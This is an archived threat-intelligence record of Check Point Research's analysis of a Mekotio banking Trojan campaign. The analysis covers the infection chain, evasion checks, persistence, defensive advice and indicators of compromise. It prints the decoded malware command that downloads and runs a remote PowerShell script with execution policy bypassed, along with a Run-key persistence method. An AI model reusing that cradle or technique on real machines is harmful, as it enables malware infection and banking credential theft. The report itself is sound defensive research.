{
	"id": "a1fe0ea4-1739-401c-b1c6-57f6253b192a",
	"created_at": "2026-04-06T00:08:03.156691Z",
	"updated_at": "2026-04-10T03:20:03.939945Z",
	"deleted_at": null,
	"sha1_hash": "8f53d13fac3a3576772ea5885ca7b6bf69228a73",
	"title": "Mekotio Banker Returns with Improved Stealth and Ancient Encryption",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 71846,
	"plain_text": "Mekotio Banker Returns with Improved Stealth and Ancient\r\nEncryption\r\nBy etal\r\nPublished: 2021-11-03 · Archived: 2026-04-05 21:39:40 UTC\r\nResearch by: Arie Olshtein \u0026 Abedalla Hadra\r\nA banking Trojan called “Mekotio” that targeted Latin America countries in the past, now making a\r\ncomeback with a change in its infection flow.\r\nCheck Point Research (CPR) detected over 100 attacks in recent weeks using the Trojan’s new technique\r\nThe infection starts out and distributed with a phishing email containing a link to a zip archive or a zip file\r\nas an attachment.\r\n One of the main characteristics of those bankers, such as Mekotio, is the modular attack which gives the\r\nattackers the ability to change only a small part of the whole in order to avoid detection.\r\nIntroduction\r\nMekotio, a modular banking Trojan that targeted Latin American countries, recently made a comeback with a new\r\ninfection flow. The new campaign started right after the Spanish Civil Guard announced the arrest of 16 people\r\ninvolved with Mekotio distribution in July 2021. It appears that the gang behind the malware were able to narrow\r\nthe gap quickly and change tactics to avoid detection.\r\nWe assume that the main cybercrime groups are operating from Brazil and they collaborated with Spanish gangs\r\nto distribute malwares. The arrest stopped the activity of the Spanish gangs but not the main cybercrime groups.\r\nMekotio’s new infection vector contains these unprecedented elements:\r\nA stealthier batch file with at least two layers of obfuscation.\r\nNew fileless PowerShell script that runs directly in memory.\r\nUse of Themida v3 for packing the final DLL payload.\r\nIn the last 3 months, we saw approximately 100 attacks use new, simple obfuscation techniques, with the help of a\r\nsubstitution cipher, to hide the first module of the attack. This simple obfuscation technique allows it to go\r\nundetected by most of the AntiVirus products.\r\nhttps://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nPage 1 of 11\n\nFigure 1 – Low detection rate of Mekotio batch file on VirusTotal\r\nDuring July and August, Check Point Threat Prevention Engine detected and blocked a wave of malicious batch\r\nfiles with unique obfuscation patterns. When we looked into it, we saw the following attack flow:\r\nAttack flow\r\nFigure 2 – Mekotio new attack flow\r\n1. The infection starts with a phishing email containing a link to a zip archive or a zip file as an attachment.\r\nThe message lures the victim to download and extract the zip content.\r\n2. When the user clicks on the zip content, the batch script is executed.\r\n3. The batch script runs a “PowerShell Download Cradles” which downloads and runs a PowerShell script on\r\nthe memory.\r\n4. The PowerShell script:\r\nChecks if the target is located in Latin America.\r\nMakes sure it is not running in a virtual machine.\r\nhttps://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nPage 2 of 11\n\nSets up persistence in the victim’s operating system.\r\nDownloads a secondary zip archive.\r\n5. The secondary zip archive contains three files:\r\n1. 1. AutoHotkey (AHK) interpreter (AutoHotkey is a free, open-source scripting language for Windows\r\nthat allows users to easily create small to complex scripts for all kinds of tasks).\r\n2. Mekotio DLL usually packed with Themida v3.\r\n3. AutoHotkey script.\r\n6. Those 3 files are extracted and saved in a new directory on the infected system.\r\n7. The PowerShell script calls the AutoHotkey interpreter to run the AHK script.\r\n8. The AutoHotkey script runs the DLL payload.\r\n9. The DLL contains the main Mekotio banker functionality for actions such as stealing access credentials for\r\nelectronic banking portals and a password stealer.\r\n10. The stolen data is sent to the C\u0026C server.\r\nLet’s now take a closer look at the malware components.\r\nPhishing email\r\nThe phishing email, which is written in Spanish, claims that there is a digital tax receipt pending submission. \r\nWhen the victims click the link in the email, a malicious zip archive is downloaded from a malicious website.\r\nhttps://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nPage 3 of 11\n\nFigure 3 – Phishing email\r\nBatch file\r\nThe batch file extracted from the first zip archive has two layers of obfuscation and often contains a file name\r\nwhich starts with “Contacto”.\r\nFigure 4 – Snippet of the obfuscated batch script\r\nhttps://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nPage 4 of 11\n\nThe first layer of the obfuscation is a simple substitution cipher. Substitution ciphers encrypt plaintext by\r\nreplacing each symbol in the plaintext with the corresponding symbol from the lookup table. The source code of\r\nthis obfuscation was probably taken from here.\r\nEach batch file contains these two lines:\r\nFigure 5 – Substitution arrays\r\nThese lines define the substitution and we can use them to deobfuscate the first layer.\r\nAfter deobfuscating the first layer, we get another layer of obfuscation:\r\nFigure 6 – Layer 2 of obfuscation\r\nIn this layer, slices of the command are saved in different environment variables. The values in lines 4-13 are\r\nconcatenated, resulting the following command:\r\npowershell.exe -ep bypass -nop -win 1\r\nThere is also a PowerShell command saved in the environment variable in the example called “mEeWtg9Pxm”\r\n(line 18), which is produced as a result of concatenating letters from the environment variable in the example\r\ncalled “o7cro6vX” (line 3).\r\nThe output of executing the lines 3 and 18 is the following PowerShell command:\r\nhttps://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nPage 5 of 11\n\nPutting everything together, the batch file executes the following command:\r\necho iex(“IEX(New-Object Net.WebClient).DownloadString(‘http://13[.]66.15.167/m/?\r\na=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT’)”); | powershell.exe -ep bypass -nop -win 1\r\nAfter executing the command, a PowerShell script is downloaded to the memory and is executed.\r\nPowerShell script\r\nThe first thing the script does is check the location of the infected system using the ipinfo.io service. If the system\r\nis not in one of these countries, (Brazil, Chile, Mexico, Spain and Peru), then the attack is terminated.\r\nFigure 7 – Checking the location of the infected system\r\nNext, the script checks if it is running in a virtual machine: it compares the computer model to the strings\r\n‘VMware Virtual Platform’ and ‘Virtual Machine’, and exits if the computer model is one of the above.\r\nhttps://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nPage 6 of 11\n\nFigure 8 – Checking if the computer is a virtual machine\r\nThe next thing the script does is to create an empty file, used as a footprint, whose name is the current date. This\r\nlets it know if it already ran in the system. If the file already exists, the script stops the execution.\r\nFigure 9 – Footprint file creation\r\nAfter checking the footprint file, a directory with a random name whose length is 8 is usually created in the\r\nProgramData Directory.\r\nFigure 10 – Creating a new directory\r\nNext, a secondary zip file with a random file name is downloaded to the directory.\r\nhttps://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nPage 7 of 11\n\nFigure 11 – Downloading the zip file\r\nThe downloaded zip archive contains three files: Mekotio payload DLL, AutoHotkey interpreter and AutoHotkey\r\nscript. After downloading the zip archive, the script extracts and renames each file in the zip archive with a\r\nrandom name and saves it in the created directory.\r\nThe script checks the size of the extracted files to distinguish between the type and the purpose of the files. The\r\nscript renames the files, adding the extension according to the detected file type.\r\nFigure 12 – Renaming files from the downloaded zip\r\nAfter renaming the extracted files, a shortcut to the AutoHotkey is created in the AppData directory. The\r\narguments to the shortcut are the AutoHotkey script and the Mekotio DLL.\r\nAn AutoHotkey process is started using the shortcut.\r\nhttps://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nPage 8 of 11\n\nFigure 13 – Creating the shortcut and starting AutoHotkey process\r\nFinally, persistence is gained by adding a new value to the following registry key:\r\n“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run”\r\nThis runs the AutoHotkey with the AHK script and the Mekotio DLL as arguments.\r\nFigure 14 – Adding a new value to the registry\r\nThe AHK script uses DllCall to run the 4th exported DLL function. By executing the AutoHotkey script, the DLL\r\nlooks like part of the AutoHotkey execution. As final payloads, we see the DLL which contains the well-known\r\nand well-covered Mekotio Banker.\r\nConclusion\r\nBanking Trojans are a common malware used in attacks targeting countries in Latin America.\r\nOne of the characteristics of those bankers, such as Mekotio, is the modular attack which gives the attackers the\r\nability to change only a small part of the whole in order to avoid detection.\r\nCPR see a lot of old malicious code used for a long time, and yet the attacks manage to stay under the radar of\r\nAVs and EDR solutions by changing packers or obfuscation techniques such as a substitution cipher.\r\nOur analysis of this campaign highlights the efforts that attackers make to conceal their malicious intentions,\r\nbypass security filtering and trick users. To protect yourself against this type of attack, be suspicious of any email\r\nor communication from a familiar brand or organization that asks you to click on a link or open an attached\r\ndocument.\r\nHere are some practical tips to help keep your data safe:\r\n1. Beware of lookalike domains, spelling errors in emails or websites, and unfamiliar email senders.\r\nhttps://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nPage 9 of 11\n\n2. Be cautious with files received via email from unknown senders, especially if they prompt for a certain\r\naction you would not usually do.\r\n3. Make sure you are ordering goods from an authentic source. One way to do this is to NOT click on\r\npromotional links in emails, and instead, Google your desired retailer and click the link from the Google\r\nresults page.\r\n4. Beware of “special” offers that don’t appear to be reliable or trustworthy purchase opportunities.\r\n5. Make sure you do not reuse passwords between different applications and accounts.\r\nOrganizations can prevent zero-day attacks with an end-to-end cyber architecture used to block deceptive phishing\r\nsites and provide alerts on password reuse in real time. Check Point Infinity is effective because it combines two\r\nkey ingredients: full convergence across all attack surfaces and all attack vectors, and advanced prevention that\r\ncan tackle the most sophisticated zero-day phishing and account takeover attacks.\r\nCheck Point Threat Emulation provides protection against this threat:\r\nWin.PSBypass.A\r\nWins.obfusBat.A\r\nIndicators of Compromise\r\nBatch Sha1\r\n09a536c2260d01fe9de33b905cde75685360cd3d\r\n106a719cecf90db98fb3a79bf22435acafcf6e4f\r\n134b1b4e2726117b0bf5ac7670f37e10f40ccc31\r\n24965ac9150a86085aa36b953ef3b181ef2007b5\r\n40ce61f375fbebf809bf55f7dba93c890ac990ac\r\n412c522f180d6d773b892e92e45c72780a9f491c\r\n4178e160fdff914718b55ded12808189939453bb\r\n561bff9aa9c807b937b460ef3d2cf0f710ff3eb5\r\n5a9d4e41d677d0caadf232b7cdcfe51cde38ed77\r\n5bc7099f709e1ae1ac0354fa99a32703e6306a6d\r\n87cbb5e4bae97f51e22668634ebc764e6a863a68\r\n87d9f2c95835a1ad9c2397d0f776eb8f2e08125c\r\nc3b93e8d68614447f462d001b7a44ccc7c3c9e52\r\nc7b3f093a320ffd2b9667c79622a42d88e2b68ac\r\nhttps://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nPage 10 of 11\n\nd1404272a3d23b143fc9fec377577cab715d9838\r\nd884cd7ac1664d1227214fe21e6ef7f657fa69a5\r\ndfde9908dc5395f9dfb4b9dae00f4a3fb555af5c\r\nfc24562b2efc77dc6174abf592fe68051751b678\r\nLinks to first zip\r\n20.206.121[.]1/arquivo.php\r\n40.90.192[.]58/factura0001450000g9.zip\r\nlianzafacture[.]eu/75rg6ty7.php?e=desktop-pc\r\nonflicitoesar[.]eu/75rg6ty7.php?e=desktop-pc\r\nontabilidadms[.]eu/75rg6ty7.php?e=desktop-pc\r\nc2-3-143-67-171.us-east-2.compute.amazonaws[.]com/arquivo.php\r\ntaingenieria[.]eu/75rg6ty7.php?e=desktop-pc\r\nerdfacturaa[.]top/arquivo.php\r\ndfcompros[.]com/arquivo.php\r\nemg-compl[.]com/75rg6ty7.php?e=desktop-pc\r\npyddteres[.]hopto.org/75rg6ty7.php?e=desktop-pc\r\nubbencion[.]australiaeast.cloudapp.azure[.]com/75rg6ty7.php?e=desktop-pc\r\nubbencion[.]eu/75rg6ty7.php?e=desktop-pc\r\nSource: https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nhttps://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/"
	],
	"report_names": [
		"mekotio-banker-returns-with-improved-stealth-and-ancient-encryption"
	],
	"threat_actors": [],
	"ts_created_at": 1775434083,
	"ts_updated_at": 1775791203,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8f53d13fac3a3576772ea5885ca7b6bf69228a73.pdf",
		"text": "https://archive.orkl.eu/8f53d13fac3a3576772ea5885ca7b6bf69228a73.txt",
		"img": "https://archive.orkl.eu/8f53d13fac3a3576772ea5885ca7b6bf69228a73.jpg"
	}
}